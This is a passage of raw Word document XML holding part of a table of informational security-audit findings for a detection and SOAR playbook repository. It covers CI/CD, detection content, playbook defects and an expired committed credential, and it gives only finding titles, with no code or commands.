                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.github/workflows/labeler.yml uses pull_request_target safely (positive control, informational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OpenAPI example values flagged by secret scanners are placeholders (informational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hard-coded admin password for the throw-away CI Splunk container (informational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bump-yaml.sh follows secure shell practices (positive note)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cleartext http:// references and malformed references in shipped content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>66 production detections validated only by disabled manual tests (attack_data provenance otherwise clean)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deprecated and removed content remains in tree; contentctl excludes it from live searches (positive control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Playbook metadata references non-existent or mismatched JSON filenames</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection identifiers unique; 127 detections with empty data_source (schema conformance otherwise clean)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Correctness and dead-code defects (misrouted enrichment dispatch, wrong keys, column mismatch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Analyst-prompt design weaknesses in the Search-and-Purge playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bare except and unguarded dictionary/division in result normalisation blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Legacy python_version and Classic-editor playbooks carry the ungated destructive patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expired AWS STS temporary credential committed in a sample log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
